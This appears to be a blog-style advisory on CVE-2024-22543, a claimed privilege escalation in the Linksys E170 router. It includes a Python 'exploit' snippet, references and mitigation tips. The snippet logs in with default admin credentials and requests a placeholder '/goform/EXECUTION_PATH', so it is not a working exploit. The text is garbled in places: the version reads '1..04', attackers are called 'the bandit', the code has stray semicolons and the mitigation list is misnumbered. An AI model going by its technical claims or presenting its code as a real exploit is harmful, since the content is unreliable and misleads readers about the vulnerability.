CVE-2024-22543: Privilege Escalation Vulnerability Impacting Linksys Router E170 1..04 (build 3)

The Common Vulnerabilities and Exposures (CVE) system recently published CVE-2024-22543, a new security vulnerability affecting the popular Linksys E170 router, specifically the version 1..04 (build 3). This vulnerability, if successfully exploited, can enable authenticated attackers to escalate privileges via crafted GET requests or by exploiting the ExportSettings function. In this long-read post, we will discuss the details of this CVE, share code snippets related to the exploit, provide links to original references, and suggest mitigation practices for end-users.

Details of the vulnerability (CVE-2024-22543)

The vulnerability affects the Linksys E170 routers running firmware version 1..04 (build 3). When an authenticated attacker sends a specifically crafted GET request to the /goform/* URI or uses the ExportSettings functionality, they can achieve privilege escalation. In layman's terms, a malicious user can gain additional access rights, enabling them to control the router and potentially access sensitive information.

Crafted GET request

An attacker with authenticated access to the web interface of the router can send a specifically crafted GET request to the /goform/* URI, resulting in the bandit's privilege elevation. Here is a code snippet illustrating the exploit:

import requests

TARGET_IP = "IP_ADDRESS"
TARGET_PORT = 80
USERNAME = "admin"  # change if necessary
PASSWORD = "admin"  # change if necessary

url = f"http://{TARGET_IP}:{TARGET_PORT}/";
session = requests.Session()

# Login to the router with your credentials
payload = {"login_name": USERNAME, "login_pass": PASSWORD, "submit_flag": "login"}
response = session.post(url, data=payload)

# Check if the login was successful
if "Incorrect user name" in response.text:
    print("Login failed. Check username.")
    exit()
elif "Incorrect password" in response.text:
    print("Login failed. Check password.")
    exit()

# Send GET request to exploit the vulnerability
target_url = f"http://{TARGET_IP}:{TARGET_PORT}/goform/EXECUTION_PATH";
response = session.get(target_url)

Replace the IP_ADDRESS, USERNAME, and PASSWORD variables with the appropriate values based on your router configuration.

ExportSettings function

An attacker with authenticated access to the web interface can exploit the ExportSettings functionality to elevate their privileges. The specific details of this exploit have not been published to protect end-users, but it is essential to consider the risks associated with it.

Original references

For more information and in-depth details on this vulnerability, you can refer to the following external links:

- CVE-2024-22543: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22543
- Linksys official website: https://www.linksys.com/us/
- Linksys E170 product page: https://www.linksys.com/gp/p/P-E170/

Mitigation

Linksys is yet to release an official firmware update addressing this vulnerability. Until then, consider the following mitigation strategies:

1. Regularly check for firmware updates for the Linksys E170 router, and apply them promptly after ensuring their authenticity from the official website.

Restrict access to the router's web interface to trusted network devices and users only.

3. Change the default username and password for the router's administration account, using strong and unique credentials.

Conclusion

CVE-2024-22543 highlights the importance of vigilantly staying up-to-date with the firmware of your router and other internet-enabled devices. By understanding the details and potential risks associated with this vulnerability, you can take the necessary steps to protect your network and minimize the chance of experiencing a successful exploit affecting your system.

Timeline

Published on: 02/27/2024 01:15:06 UTC
Last modified on: 02/27/2024 14:20:06 UTC